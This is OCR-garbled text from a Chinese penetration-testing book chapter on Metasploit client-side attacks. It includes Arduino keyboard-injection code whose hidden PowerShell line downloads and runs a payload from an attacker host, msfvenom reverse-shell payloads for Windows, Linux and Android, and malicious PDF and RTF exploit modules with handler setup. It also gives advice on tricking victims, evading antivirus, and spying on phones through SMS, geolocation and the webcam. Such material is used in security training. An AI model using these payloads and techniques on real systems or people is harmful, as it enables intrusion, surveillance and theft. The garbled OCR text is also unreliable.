标 以 及 各 种 其 他 行为 。 在 本 节 中 ,我 们 将 一 个 Arduino Pro 微 板 模拟 成 键盘 ， 然 后 从 远程 站 点 下 载 
并 执行 恶意 攻击 载荷 。 不 过 需要 注意 的 是 , 这 些微 板 上 没有 足够 的 存储 空间 ， 所 以 必须 从 远程 下 
载 攻击 载 位 。 


3) 如 果 想 要 使 用 HID 设 备 进行 渗透 测试 ， 也 可 以 考虑 使 用 USB Rubber Ducky 
或 Teensy。 


你 可 以 在 一 些 很 受 欢迎 的 购物 网 站 ( 如 Aliexpress.com 等 ) 上 用 不 到 4 美元 购买 到 Arduino Pro 
微 板 。 所 以 ， 比 起 Teensy 和 USB Rubber Ducky, Arduino Pro 微 板 可 便宜 多 了 。 


使 用 编译 软件 对 Arduino 进 行 配置 也 并 不 困难 。 如 果 你 已 经 具备 了 一 些 编程 经 验 的 话 ， 会 发 
现 这 个 练习 十 分 容易 。 


QD 如 果 想 获取 关于 设置 和 启动 Arduino 的 更 多 信息 ， 请 访问 地 址 https://www. 


rduino.cc/en/Guide/Windows。 


下 面 是 需要 烧 录 到 Arduino 忆 片上 的 代码 : 


dinclude«Keyboard.h» 
void setup() ( 

delay (2000); 

type(KEY, LEFT GUI,false); 
type('d',false); 
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Keyboard.releaseAl11(); 
delay (500); 
type(KEY LEFT GUI,false); 
type('r',false); 
delay (500); 
Keyboard.releaseAl11(); 
delay (1000); 
print(F("powershell -windowstyle hidden (new-object 
System.Net.WebClient).DownloadFile('http://192.168.10.107/pay2.exe', '$€TEMP£ 
\\mal.exe'); Start-Process "$TEMP$NWnal.exe"")); 
delay (1000); 
type(KEY RETURN,false); 
Keyboard.releaseA11(); 
Keyboard.end(); 
} 
void type(int key, boolean release) { 
Keyboard.press(key); 
if(release) 

Keyboard.release(key); 


} 

void print (const __FlashStringHelper *value) ( 
Keyboard.print (value); 

} 

void loop(){} 


这 段 代 码 中 有 一 个 名 为 type 的 函数 ， 这 个 函数 需要 两 个 参数 ， 一 个 为 要 按 下 或 者 释放 的 键 
的 名 称 ， 另 一 个 为 是 否 需要 释放 这 个 键 。 接 下 来 出 现 的 函数 是 print ， 它 将 替换 默认 的 print 打 
印 函 数 ， 利 用 keyboard 库 的 press () 函数 直接 输出 文本 。Arduino 有 两 个 主要 函数 ， 分 别 是 loop 
和 setup。 因 为 这 里 只 需 下 载 和 执行 一 次 攻击 载荷 ， 所 以 将 所 有 代码 都 放置 在 了 setup 函 数 中 。 
当 需 要 重复 执行 指令 的 时 候 , 才 会 使 用 到 1oop 函 数 。gdelay 函 数 和 sleep 函 数 功 能 相同 ,都 是 让 
程序 在 指定 时 间 内 (单位 为 之 秒 ) 暂停 执行 。type (KEY_LEFT_GUI，false) ;语句 表示 要 按 下 
目标 系统 键盘 左 侧 的 win 键 且 一 直 保 持 按 下 的 状态 ， 所 以 我 们 要 将 false 作 为 释放 的 参数 。 接 下 
来 使 用 相同 的 方法 按 下 d 键 。 现 在 我 们 已 经 按 下 了 两 个 键 ， 即 Windows + d 键 ( 显示 桌面 操作 的 快 
捷 键 )。 当 我 们 执行 keyboard .releaseAll () ;函数 时 ,目标 系统 就 会 执行 windqows+da 命 令 , 从 
而 将 桌面 上 的 所 有 窗口 最 小 化 。 


3] A V]https://www.arduino.cc/en/Reference/K eyboardModifierzk RÆ 2 X T 
Arduino 的 keyboard 库 的 信息 。 


通过 同样 的 方法 使 用 下 一 个 组 合 键 来 显示 运行 命令 框 。 在 运行 命令 框 中 输入 PowerShel1 命 
S, 从 远程 站 点 下 载 攻击 载荷 ,也 就 是 192 .168.10.107/pavy2 .exe。 然后 将 这 个 攻击 载荷 保存 
在 Temp 文 件 夹 中 ， 并 从 这 里 执行 。 输 入 命令 后 ， 需 要 按 回 车 键 来 执行 这 个 命令 。 

这 一 点 可 以 通过 将 KEY_RETURN 作 为 按键 值 传递 给 函数 来 实现 。 下 面 来 看 看 如 何 对 Arduino 
板 实现 写 人 操作 。 


File Edit Sketch Tools | Help 


Auto Format Ctrl T 
sketch augi6a Archive sketch 
P Fix Encoding & Reload 
Serial Monitor CtriShift-M 
Serial Plotter Ctri«Shift«L 


Boards Manager... 

Port Arduino AVR Boards 

Arduino Yün 

Arduino/Genuino Uno 

Arduino Duemilanove or Diecimila 
Arduino Nano 

Arduino/Genuino Mega or Mega 2560 
Arduino Mega ADK 


Programmer: "AVRISP mklI* 
Burn Bootloader 


Arduino/Genuino Micro 
Arduino Esplora 
Arduino Mini 

Arduino Ethernet 
Arduino Fio 

Arduino BT 

LilyPad Arduino USB 
LilyPad Arduino 
Arduino Pro or Pro Mini 
Arduino NG or older 
Arduino Robot Control 
Arduino Robot Motor 
Arduino Gemma 


如 上 图 所 示 ， 单 击 菜单 栏 上 的 Tools 选 项 ， 选 择 我 们 使 用 的 Arduino 板 类 型 ， 然 后 再 选择 和 
Arduino 板 通信 的 端口 。 


- d 
Tools Help 
Auto Format CahT 
Archive Sketch 
Fix Encoding & Reload 
Serial Monitor CirisShifteM E 


Serial Plotter. CtrisShift«L 
Board: "Arduino Leonardo" R 
Port "COM3 (Arduino Leonardo)" d Serial ports 


M CONG (Arduino Leonardo) 


Programmer: "AVRISP ma 
Burn Bootloader 


tyle nidcen (new-cbject System. Nec.WebCLient) .Downloaarile ("hxtp://tne.earzb.L1/-Sgtatham/putty/O. 64/X56/putty.exe" , "TEMPS V Cutty.exe"); Start-Process V'SIEMEN V tuzty, exe" 7])r 


met. Flashstringfelper value) { 
ara.print (valae]; 


void locpQ L 
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接 下 来 按 下 -> 按钮 ， 就 可 以 将 程序 写 到 Arduino 板 上 。 


© hh | Arduino 1.6.8 c 口 x 


File Edit Sketch Tools Help 


ude«Keyboard.h» 
setup() ( 

lay (2000); 

type (REY LEFT GUI, false); 
type ('d' 
Keyboard 


Keyboard. seA 

Keyboard.end (); 

} 

void type(int key, boolean release) [] 
Keyboard.press 


RR EE N ， 更 棒 的 是 它 还 将 自 eos 只 成 了 一 个 键盘 ， 


因此 你 无 须 担 , 


然后 像 下 


心 被 发 现 。 不 过 你 的 攻击 载荷 必须 经 过 充分 的 处 理 ， 才 能 逃 过 杀毒 软件 的 检查 。 
图 般 插 入 Arduino 设 备 。 
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插入 设备 之 后 的 短 短 几 毫秒 内 ,攻击 载荷 就 已 下 载 完 毕 , 并 在 目标 系统 执行 。 然 后 就 可 以 查 
看 到 如 下 图 所 示 的 信息 。 


[*] Started reverse TCP handler on 192.168.10.107:5555 

[*] Starting the payload handler... 

[*] Sending stage (1188911 bytes) to 192.168.10.105 

[*] Meterpreter session 3 opened (192.168.10.107:5555 -> 192.168.10.105:12668 
) at 2016-07-05 15:51:14 +0530 


meterpreter > m 


Computer DESKTOP -PESQ21S 
os : Windows 10 (Build 10586). 
Architecture : x64 
System Language : en_US 
Domain : WORKGROUP 
Logged On Users : 2 
Meterpreter : x64/win64 
meterpreter > 
Pri EE ng ^ ed 


root(àmm:-4 msfvenom -p windows/x64/meterpreter/reverse tcp LH0ST-192.168.10.107 


LPORT-5555 -f exe > /var/www/html/pay2.exe 
No platform was selected, choosing Msf::Module::Platform::Windows from the paylo 


ad 
No Arch selected, selecting Arch: x86 64 from the payload 
No encoder or badchars specified, outputting raw payload 
Payload size: 510 bytes 


root(mm:-4£ service apache2 start 
root(mm: ~# 
我 们 已 经 生成 了 一 个 适用 于 64 位 Windows 操 作 系统 的 Meterpreter 攻 击 载荷 , 它 将 会 主动 回 连 
到 我 们 系统 的 5555 端 口 。 将 这 个 攻击 载荷 保存 在 Apache 文 件 夹 内 ， 并 如 上 图 图 所 示 启 动 Apache。 
接 下 来 只 需 启 动 渗透 模块 的 handler 来 监听 到 达 5555 端 口 的 连接 即 可 ， 这 个 过 程 如 下 图 所 示 。 


msf expLoit(handLer) > back 
msf > use exploit/multi/handler 
p exploit(handler) > set payload windows/x64/meterpreter/reverse t 
f exploit(handler) » set LPORT 5555 
msf exploit(handler) » set LHOST 192.168.10.107 
msf exploit(handler) » exploit 


[*] Started reverse TCP handler on 192.168.10.107:5555 
[*] Starting the payload handler... 


在 这 里 我 们 见识 到 了 一 种 全 新 的 攻击 手段 一 一 只 需要 一 个 廉价 的 微 控制 器 , 就 可 以 获得 一 个 
Windows 10 系 统 的 控制 权限 。Arduino 是 一 种 很 有 趣 的 工具 , 我 也 建议 你 去 阅读 一 些 关 于 Arduino、 
USB Rubber Ducky 、Teensy 和 Kali Net Hunter 等 工具 的 资料 。 你 可 以 在 任何 的 Android 手 机 使 用 Kali 
Net Hunter 来 效仿 同样 的 攻击 手段 。 
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有 关 Teensy 的 更 多 信息 ， 请 访问 https:/www.pjrc.com/teensy/。 


Qo Æ XUSB Rubber Ducky 的 更 多 信息 ， 请 访问 http://hakshop.myshopify.com/ 
products/usb-rubber-ducky-deluxe。 
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这 一 世 将 会 涵盖 对 受害 者 基于 各 种 文件 格式 的 渗透 攻击 。 一 旦 执行 这 个 恶意 文件 , 它 就 会 加 
我 们 提供 一 个 目标 系统 的 Meterpreter 或 者 shell 控 制 权 限 。 在 下 一 节 中 ， 我 们 将 会 讲解 如 何 使 用 恶 
意 文 要 和 PDF 文件 对 目标 进行 渗透 。 


7.3.1 基于 PDF 文件 格式 的 渗透 攻击 


基于 PDF 文件 格式 的 渗透 模块 会 触发 各 种 PDF 阅读 器 和 解析 器 的 漏洞 。 当 这 些 包含 攻击 载 符 
的 PDF 文件 执行 时 ， 就 会 向 攻击 者 提供 一 个 Meterpreter 或 者 命令 行 控制 权限 。 但 是 在 动手 实现 这 
种 攻击 之 前 ， 先 来 查看 一 下 渗透 要 利用 的 相关 漏洞 以 及 环境 的 细节 。 


测试 案例 ji 述 
漏洞 在 Smart Independent Glyplets (SING) 表 中 的 uniquename 存 在 着 栈 溢出 漏洞 
目标 渗透 系统 Windows 7 32 位 
软件 版 本 Adobe Reader 9 
影响 到 的 版 本 适用 于 Windows、Macintosh 和 Unix 的 AdobeReader 9.3.4 及 更 早 版 本 ， 适 用 于 Windows 和 
Macintosh 的 Adobe Acrobat 9.3.4 及 更 早 版 本 
CVE 描 述 涂 透 模块 http://www.adobe.com/support/security/advisories/apsal0-02.html 
渗透 模块 的 细节 /modules/exploits/windows/fileformat/adobe cooltype sing.rb 


为 了 能 通过 这 个 漏洞 进行 渗透 攻击 ， 首 先 创 建 一 个 恶意 PDF 文件 ,然后 将 这 个 文件 发 送 给 受 
害 者 。 当 受害 者 试 网 打开 这 个 恶意 PDF 文件 时 ,我 们 就 可 以 获得 一 个 设 定好 的 攻击 载荷 模块 所 提 
供 的 Meterpreter 控 制 行 或 者 命令 行 。 接 下 来 尝试 构建 一 个 亚 意 PDF 文件 。 


msf > use exploit/windows/fileformat/adobe cooltype sing 
查看 一 下 都 需要 设置 哪些 选项 才能 让 这 次 攻击 正常 进行 。 


msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse tcp 
payload -» windows/meterpreter/reverse tcp 


我 们 之 所 以 使 用 reverse_tcp 作 为 攻击 载荷 模块 来 创建 从 被 害 者 的 系统 到 攻击 者 之 间 的 连 
接 ， 是 因为 我 们 并 不 能 直接 连接 到 目标 计算 机 上 。 被 害 者 往往 是 在 偶然 中 打开 文件 ， 因 此 
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reverse_tcp 一 旦 被 执行 ， 它 将 会 建立 一 个 到 攻击 者 监听 还 的 连接 。 这 些 内 容 的 设置 如 下 面 的 
屏幕 截图 所 示 。 


msf exploit(adobe cooltype sing) > set LHOST 192.168.65.128 
LHOST => 192.168.65.128 
msf exploit(adobe cooltype sing) > show options 


Module options (exploit/windows/fileformat/adobe cooltype sing): 


Name Current Setting Required Description 


FILENAME msf.pdf yes The file name. 


Payload options (windows/meterpreter/reverse tcp): 


Name Current Setting Required Description 

EXITFUNC process yes Exit technique: seh, thread, process, no 
ne 

LHOST 192.168.65.128 yes The listen address 

LPORT 4444 yes The listen port 


在 这 里 要 设置 所 有 需要 的 选项 (例如 LHOST 和 LPORT )， 它 们 都 是 发 起 到 攻击 者 计算 机 的 连 
接 所 必需 的 。 在 设置 了 所 有 参数 以 后 , 使 用 exploit 命 令 创建 一 个 恶意 文件 ， 并 把 它 发 送 给 受害 
Žo d 这 个 过 程 如 下 面 的 屏幕 截图 所 示 。 


msf exploit(adobe cooltype sing) > exploit 


[*] Creating 'msf.pdf' file... 

[*] Generated output file /root/.msf4/data/exploits/msf.pdf 

msf  exploit(adobe cooltype sing) > back 

msf » use exploit/multi/handler 

msf exploit(handler) > set payload windows/meterpreter/reverse tcp 
payload -» windows/meterpreter/reverse tcp 


Tr Gee oen e Bum EE PDF, 我们 将 其 发 送 给 受害 者 。 接 着 启动 一 个 
handler ， 用 来 监听 PDF 文件 在 目标 计算 机 发 回 到 攻击 者 计算 机 的 所 有 连接 。exploit/ 
multi handier ETRA] 的 Metasploit 模 块 ， 它 用 来 处 理 在 成 功 渗透 目标 计算 机 之 后 返回 的 
所 有 类 型 的 连接 。 这 个 过 程 如 下 面 的 屏幕 截图 所 示 。 


msf exploit(handler) > set LHOST 192.168.65.128 
LH0ST => 192.168.65.128 
msf exploit(handler) > exploit 


Started reverse handler on 192.168.65.128:4444 

Starting the payload handler... 

Sending stage (752128 bytes) to 192.168.65.131 

Meterpreter session 1 opened (192.168.65.128:4444 -» 192.168.65.131:49178) a 
013-09-04 06:05:50 40530 


NJ 号 一 一 一 


meterpreter > 
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在 设置 handler 并 按 PDF 文 件 中 所 使 用 的 细节 配置 handler 之 后 , 我 们 使 用 exploit 命 令 来 运行 
该 handler。 现 在 一 旦 受害 者 执行 了 这 个 文件 ， 我 们 就 会 得 到 一 个 Meterpreter 控 制 会 话 ， 就 像 上 面 
的 屏幕 截图 中 显示 的 那样 。 


此 外 ， 从 受害 者 的 角度 来 看 ， 软 件 Adobe Reader 很 可 能 没有 响应 ， 这 将 使 目标 计算 机 在 一 定 
时 间 内 停止 响应 ， 如 下 面 的 屏幕 截图 所 示 。 


=) msf.pdf - Adobe Reader (Not Responding) 
File Edit View Document Tools Window Help 


(人 赶快 使 用 migrate 命 令 迁 移 到 另 一 个 进程 上 ， 因 为 一 旦 Adobe Reader 的 进程 
被 关闭 ， Meterpreter shell 刀 会 被 销毁 。 


7.3.2 基于 Word 文件 格式 的 渗透 攻击 


bind o re MATE 可 以 在 Microsoft Word 中 加 载 的 文件 格式 ， 其 中 一 些 格 
式 的 文件 可 以 执行 恶意 代码 并 使 得 攻击 者 获得 目标 系统 的 管理 权限 。 在 这 里 可 以 利用 与 之 前 PDF 
文件 渗透 中 相同 的 方法 。 让 我 们 快速 查看 一 下 关于 该 漏洞 的 描述 


测试 用 例 描 述 
漏洞 在 Microsoft Word 中 的 RTF 分 析 器 中 的 pFPragments 属 性 容易 受到 栈 缓冲 区 溢出 攻击 
渗透 软件 所 在 的 系统 Windows 7 32 位 
测试 所 使 用 的 系统 Microsoft Word 2007 
受 影响 的 系统 Microsoft Office XP SP 


Microsoft Office 2003 SP 3 
Microsoft Office 2007 SP 2 
Microsoft Office 2010 (32 位 版 本 ) 
Microsoft Office 2010 (64 位 版 本 ) 
Microsoft Office for Mac 2011 


CVE 信 息 http://www.verisigninc.com/en US/cyber-security/security-intelligence/vulnerability-reports/ 
articles/index.xhtml?id-880 
渗透 模块 细节 /exploits/windows/fileformat/ms10 087 rtf pfragments_bof.rb 


尝试 利用 这 个 漏洞 来 获取 目标 系统 的 控制 权限 。 因 此 ， 首 先 启动 Metasploit， 并 按照 如 下 屏 
幕 截图 所 示 创 建 一 个 文件 。 


msf > use exploit/windows/fileformat/ms10 087 rtf pfragments bof 
msf exploit(msi0 087 rtf pfragments bof) > set payload 
payload -» windows/meterpreter/reverse tcp 


接 下 来 设置 好 所 有 参数 , 这 些 参 数 将 会 帮助 我 们 建立 从 受害 者 计算 机 到 攻击 者 的 连接 。 按照 
如 下 屏幕 截图 所 示 设 置 文件 的 名 称 。 
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Imsf  exploit(msi0 087 rtf pfragments bof) > set FILENAME NPJ.rtf 
FILENAME -» NPJ.rtf 
msf  exploit(msl0 087 rtf pfragments bof) > exploit 


[*] Creating 'NPJ.rtf' file .. 
[*] Generated output file /root/. msf4/data/exploits/NPJ.rtf 


可 以 通过 各 种 方式 将 NPI.rtf 文 件 发 送 给 受害 者 ,比如 上 传 这 个 文件 然后 将 下 载 链接 发 送 
害 者 , 或 者 利用 一 个 USB 存 储 设备 ,也 可 以 将 其 压缩 然后 通过 邮件 发 送 。 现 在 ， 只 要 受害 Wins 
开 Word 文 档 ， 我 们 就 会 获得 目标 计算 机 的 Meterpreter 控 制 权限 。 不 过 ， 为 了 获得 这 个 Meterpreter 
控制 权限 ， 需 要 像 早 先 那样 设置 handler， 如 下 面 的 屏幕 截图 所 示 。 


sf > use exploit/multi/handler 


设置 所 有 必需 的 选项 ( 比如 payload 和 LHOST )。 首 先 设置 pay1oad。 


msf exploit(handler) > set payload windows/meterpreter/reverse tcp 
payload => windows/meterpreter/reverse tcp 


接着 设置 LHOsT 的 值 ， 男 外 ,保持 LPORT 的 默认 值 41444 不 变 ，LHOsST 的 值 的 设置 过 程 如 下 面 
的 屏幕 截图 所 示 。 


一 


msf expLoit(handLer) > set LHOST 192.168.65.128 
LHOST => 192.168.65.128 


我 们 已 经 完成 了 启动 handler 的 全 部 准备 工作 , 接 下 来 就 启动 handler 并 等 待 受害 者 打开 恶意 
文件 。 


msf exploit(handler) > exploit 
*] Started reverse handler on 192.168.65.128:4444 
] Starting the payload handler... 

] Sending stage (752128 bytes) to 192.168.65.131 

] Meterpreter session 1 opened (192.168.65.128:4444 -» 192.168.65.131:49169) a 
2013-09-04 06:29:07 40530 


* 
* 
* 


meterpreter » 


正如 在 上 图 中 所 看 到 的 那样 ， 我 们 立刻 就 绪 得 了 Meterpreter 命 令 行 控制 权限 。 换 个 角度 ， 在 
受害 者 的 眼中 ， 看 到 的 是 如 下 景 


W) Microsoft Word (Not Responding) 


正如 看 到 的 那样 ，Microsoft Word 不 再 响应 , 这 意味 着 这 个 应 用 已 经 骨 溃 。 过 了 一 会 儿 以 后 ， 
会 看 到 如 下 图 所 示 的 弹出 窗口 。 
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P 


E? Microsoft Office Word 
Microsoft Office Word is not responding 
Windows can check online for a solution. If you close the program, you might lose 
information. 
3 Check for a solution and close the program 


> Close the program 


3» Wait for the program to respond 


v) View problem details 


Microsoft Office 2007 发 生 了 严重 问题 并 被 系统 挂 起 。 因 此 ， 最 好 尽快 将 Meterpreter 迁 移 到 另 
一 个 进程 上 ， 和 否则 ， 这 次 控制 连接 就 会 被 切断 。 


7.4 使 用 Metasploit 实现 对 Linux 客户 端的 渗透 


跟 之 前 使 用 可 执行 文件 〈.exe ) 渗透 Windows 系 统一 样 ， 我 们 也 可 以 很 轻松 地 使 用 elf 文 件 获 
取 Linux 系 统 的 控制 权限 。 现 在 使 用 msfvenom 命 令 创 建 一 个 elf 文 件 ， 并 将 这 个 文件 传递 给 Linux 
系统 。 然 后 创建 一 个 handler， 处 理 从 被 渗透 系统 发 出 的 连接 。 下 面 来 看 看 如 何 轻松 实现 对 Linux 
系统 的 渗透 。 


root@mm:-# msfvenom -p linux/x86/meterpreter/reverse tcp LH0ST-192.168.10.107 LP 
ORT-5555 -f elf» /var/www/html/pay3.elf 

No platform was selected, choosing Msf::Module::Platform::Linux from the payload 
No Arch selected, selecting Arch: x86 from the payload 

No encoder or badchars specified, outputting raw payload 

Payload size: 71 bytes 


我 们 创建 了 一 个 elf 文 件 ， 并 将 它 复 制 到 了 Apache 的 public 目 录 。 和 在 之 前 的 示例 中 使 用 
msfvenom 命 令 一 样 , 两 者 的 区 别 在 于 Windows 操 作 系 统 使 用 的 默认 文件 格式 为 exe, 而 Linux 系 统 
使 用 的 默认 文件 格式 为 elf。 接 下 来 需要 在 现实 世界 中 接近 并 控制 目标 系统 , 或 者 向 目标 发 送 恶意 
文件 。 现 在 假设 我 们 可 以 在 现实 世界 中 取得 系统 的 物理 访问 权限 并 开始 执行 如 下 步 又。 


poot@ubuntu:”# wget http://192.168.10.107/pay3.elf 
-2016-07-05 18:20:57-- http:⁄7192.168.10.107⁄/pay3.elf 
onnecting to 192.168.10.107:80... connected. 
TTP request sent, awaiting response... 200 Ok 
aec 
Saving to: “pau3.elf 


nid 74: in 0s 


Po16-07-05 18:20:57 (32.0 MB/s) - 'pay3.elf' saved [155/155] 


Iroot?ubuntu:^t chmod 777 pay3.elf 
IrootGubuntu:^tt ./pay 
pau3 .elf 
iroot?eubuntu:^tt .^pay 
pay3.elf 
root@ubuntu:“# .pau3.e1lf 


现在 使 用 wget 工 具 来 下 载 文件 ， 然 后 使 用 chmod 命 令 获得 完全 控制 权限 。 
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e 


接 下 来 执行 这 个 文件 ， 这 将 触发 handler， 我 们 也 将 获得 目标 程序 的 Meterpreter 权 限 ， 
程 如 下 图 所 示 。 


从 Linux 系 统 获得 Meterpreter 权 限 十 分 简单 。 此 外 ，Linux 系 统 也 可 能 被 恶 


访问 ， 这 通常 被 认为 是 在 进行 专业 渗透 测试 时 最 好 的 做 法 。 


msf > use exploit/multi/handler 

psf exploit(handler) > set payload linux/x86/meterpreter/reverse tcp 
payload -» linux/x86/meterpreter/reverse tcp 

msf exploit(handler) > setg LHOST 192.168.10.107 

LHOST => 192.168.10.107 

msf exploit(handler) » setg LPORT 5555 

LPORT => 5555 

msf exploit(handler) » exploit 


[*] Started reverse TCP handler on 192.168.10.107:5555 

[*] Starting the payload handler... 

[*] Transmitting intermediate stager for over-sized stage...(105 bytes) 

[*] Sending stage (1495599 bytes) to 192.168.10.108 

[*] Meterpreter session 5 opened (192.168.10.107:5555 -> 192.168.10.108:33070 
) at 2016-07-05 18:21:30 +0530 


meterpreter » ls 
Listing: /root 


Mode Size Type Last modified Name 
100600/rw------- 1142 fil 2016-06-21 16:09:43 40530  .bash history 
100644/rw-r--r-- 3106 fil 2014-02-20 08:13:56 40530  .bashrc 
40700/rwx------ 4096 dir 2016-06-19 23:38:00 40530 .cache 
100600/rw- - ----- 125 fil 2016-06-20 00:05:38 40530  .mysql history 


100644/rw-r--r-- 140 fil 2014-02-20 08:13:56 +0530 .profile 
100777/rwxrwxrwx 188 fil 2016-07-05 18:10:50 +0530 pay2.elf 
100777/rwxrwxrwux 155 fil 2016-07-05 18:20:04 40530  pay3.elf 


meterpreter » sysinfo 

Computer : ubuntu 

os : Linux ubuntu 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 2 
2 15:32:27 UTC 2016 (i686) 

Architecture : i686 

Meterpreter : x86/linux 


meterpreter > 


这 些 案例 中 ， 用 户 都 是 在 安装 了 一 个 恶意 软件 包 之 后 就 触发 了 handler。 


e 


7.5 使 用 Metasploit 攻击 Android 系统 
d um ru D cu HE 


VIZ & 


。 我 们 采 


人 
这 通 


这 个 过 


意 软 件 包 攻击 。 在 


有 关 Linux 系 统 中 木马 文件 的 更 多 信息 ,请 访问 https://www.offensive-security. 


com/metasploit-unleashed/binary-linux-trojan/。 


第 一 种 方法 。 首 先 使 用 如 下 图 所 示 的 ms fvenom 命 令 来 创建 一 个 APK 文 件 。 
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zootemm:~# msfvenom -p android/meterpreter/reverse tcp LHOST-192.1 
68.10.107 LPORT-4444 R» /var/www/html/pay2.apk 

No platform was selected, choosing Msf::Module::Platform::Android 
from the payload 

No Arch selected, selecting Arch: dalvik from the payload 

No encoder or badchars specified, outputting raw payload 

Payload size: 8833 bytes 


成 功 创建 APK 文 件 之 后 , 我 们 需要 欺骗 受害 者 (使 用 社会 工程 学 ) 去 安装 这 个 APK 文 件 , 或 
者 真 的 去 接触 这 个 电话 。 下 面 来 看 看 当 受害 者 下 载 了 这 个 恶意 的 APK 文 件 之 后 都 会 发 生 什么 。 


A This type of file can harm your device. Do x 
you want to keep pay2.apk anyway? 


下 载 完 成 之 后 ， 用 户 就 可 以 安装 这 个 文件 了 ， 过 程 如 下 图 所 示 。 


* 4 m 647 
全 MainActivity 


Do you want to install this application? It will 
get access to: 
take pictures and videos 


modify your contacts 
read your contacts 


9 precise location (GPS and network-based) 


record audio 


电 

WS directly call phone numbers 
® this may cost you money 
read phone status and identity 


m read your text messages (SMS or MMS) 
receive text messages (SMS) 
send and view SMS messages 
$& this may cost you money 


Bl modify or delete the contents of your USB 
storage 


read the contents of your USB storage 


CANCEL INSTALL 


绝 大 多 数 人 都 不 会 注意 应 用 程序 在 安装 时 所 要 求 的 权限 。 因 此 , 攻击 者 可 以 获得 手机 的 全 部 
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权限 并 偷 走 用 户 的 个 人 隐私 数据 。 上面 的 截图 列 出 了 一 个 应 用 程序 正常 运 和 
攻击 者 就 可 以 获得 目标 手机 的 完全 控制 权限 。 


成 功 之 后 ， 


怎么 样 ， 我 们 是 不 是 轻松 获取 了 目标 系统 的 Meterpreter 控 制 权 限 ?” 下 一 章 将 会 
透 模块 ， 现 在 先 来 看 一 些 它 


可 以 使 用 check_root 命 令 检 查 目 标 设 备 是 否 已 经 


使 用 sena_sms 命 令 可 以 从 被 渗透 的 手机 向 任意 


成 功 。 


了 所 需 的 权限 。 当 安装 


msf > use exploit/multi/handler 


msf exploit(handler) > set payload android/meterpreter/reverse tcp| 


payload => android/meterpreter/reverse t 


msf exploit(handler) » set LHOST 192.168.10.107 


LHOST => 192.168.10.107 

msf exploit(handler) » set LPORT 4444 
LPORT => 4444 

msf exploit(handler) » exploit 


[*] Started reverse TCP handler on 192.168.10.107:4444 


[*] Starting the payload handler... 


[*] Sending stage (60830 bytes) to 192.168.10.104 
[*] Meterpreter session 1 opened (192.168.10.107:4444 -> 192.168.1 


0.104:44753) at 2016-07-05 18:47:59 +0530 


meterpreter > ü 


已 的 基本 功能 。 


详细 介绍 后 渗 


Device is rooted 


meterpreter > check root 


进行 了 root 操 作 。 下 面 来 看 看 其 他 函数 。 


meterpreter > send sms -d 8130 NN -t "hello" 
SMS sent - Transmission successful 


Peerlyst 


16 17:38. 


5:48 PM 


Sat, 06/11/2016 


© ql call 


you later. 


© hello 


2 


号 码 发 送 短信 ， 下 面 来 看 看 短信 和 是否 发 送 
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干 得 漂亮 ! 短信 已 经 成 功 发 送 。 接 下 来 就 让 我 们 使 用 sysinfo 命 令 来 查看 一 下 这 台 “ 猎 物 ” 
的 信息 吧 。 


meterpreter > sysinfo 
Computer : localhost 


os : Android 6.0.1 - Linux 3.10.40-g34f16ee (armv71) 
Meterpreter : java/android 


接 下 来 对 这 部 手机 进行 定位 。 


meterpreter > wlan geolocate 
[*] Google indicates the device is within 150 meters of 28.5448806,77.3689138. 
[*] Google Maps URL: Mhttps://maps.google.com/?q-28.5448806,77.3689138 


通过 从 谷歌 地 图 上 查看 这 个 坐标 ， 可 以 找到 这 部 手机 所 在 的 精确 位 置 。 


三 28.5448806,77.3689138 


Cadence Guel 


Chocomocho 


[-] 
Shri Voda Mahadev ^ 
Shiv Temple " 
enyi " enn "| Q 
28°32'41.6"N 77°22'08.1"E Canen Planet Lotier m 
Directions 
m 3C Lotus Boulevard 
© t1 < STE BAR OT In Overhead M nin walk = hor 
tate Bani jia Tmin wi CERN Wane 
SAVE NEARBY SEND TO YOUR SHARE e eean : Ü o 
PHONE Ter 12, Lotus 
Boulevard 
m 
P» — Addalabel Sm 
Ai Shilnal 


然后 使 用 被 渗透 手机 的 摄像 头 来 拍 几 张 照片 看 看 。 


Ineterpreter » webcam snap 
[*] Starting... 
Got frame 
[*] Stopped 
Webcam shot saved to: /root/XlGjwKRr.jpeg 


可 以 通过 摄像 机 看 到 如 下 图 片 。 


gCijLhvF.jpeg 


| Image Edit View Go Help 
| < Previous > Nec Q & aA 5 c 
| Image Properties {v x 
General 
Name: 
gCijLhvF.jpeg 
Width: 
4160 pixels 
Height: 
3120 pixels 


Type: 
JPEG image 
File size: 
483.4 kB 
| Folder: 
root | 


Metadata 
Aperture Value: 
1/2.0 
| Exposure Time: 
1/12 sec. 
Focal Length: 
0.0 (35mm film), 3.8 
(lens) 


| Flash: 
Flash did not fire 
ISO Speed Rating: 
870 
| Metering Mode: 
Unknown 


Camera Model: 
Nexus 6 


4160 x 3120 pixels 483.4kB 24% 1/2 


7.6 小 结 


在 本 章 中 我 们 动手 实践 了 一 种 客户 端 渗透 攻击 。 使 用 客户 端 攻 击 会 使 一 个 处 于 网 络 内 部 的 渗 
透 测试 工程 师 的 审计 工作 变 得 十 分 轻松 。 在 网 络 内 部 攻击 比 外 部 攻击 更 为 有 效 的 情形 下 , 也 可 以 
减轻 测试 工程 师 的 工作 强度 。 

本 章 还 讲解 了 各 种 攻击 基于 客户 端的 系统 的 技术 。 我 们 学 习 了 基于 浏览 器 的 渗透 方法 及 其 延 
伸 方法 , 使 用 Arduino 对 基于 Windows 的 系统 进行 了 渗透 , 了 解 了 如 何 创建 各 种 文件 格式 的 渗透 模 
块 及 如 何 使 用 Metasploit 进 行 DNS 欺骗 攻击 。 最 后 , 还 学 习 了 如 何 对 基于 Linux 的 客户 端 进行 渗透 ， 
以 及 如 何 对 Android 设 备 进 行 渗透 。 


在 下 一 章 中 ,我们 将 详细 研究 高 级 的 攻击 向 量 和 后 渗透 测试 。 
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Metasploit 的 扩展 功能 


“不 必 对 盗窃 心怀 丽 惧 ， 我 们 只 盗 取 应 该 被 偷 的 东西 。” 


Mike Monteiro 


本 章 将 介绍 Metasploit 的 扩展 功能 和 后 渗透 模块 中 的 核心 部 分 。 在 这 一 章 中 ， 我 们 将 重点 放 
在 后 渗透 模块 中 可 以 直接 使 用 的 功能 上 ， 还 尝试 了 各 种 复杂 的 任务 ， 例 如 提升 权限 、 获 取 明 文 密 
码 、 查 找 有 用 信息 ， 等 等 。 
在 学 习 本 章 的 过 程 中 ， 我 们 将 对 以 下 几 个 要 点 进行 重点 讲解。 
a 完成 基本 的 后 渗透 任务 。 
a 使 用 高 级 后 渗透 模块 。 
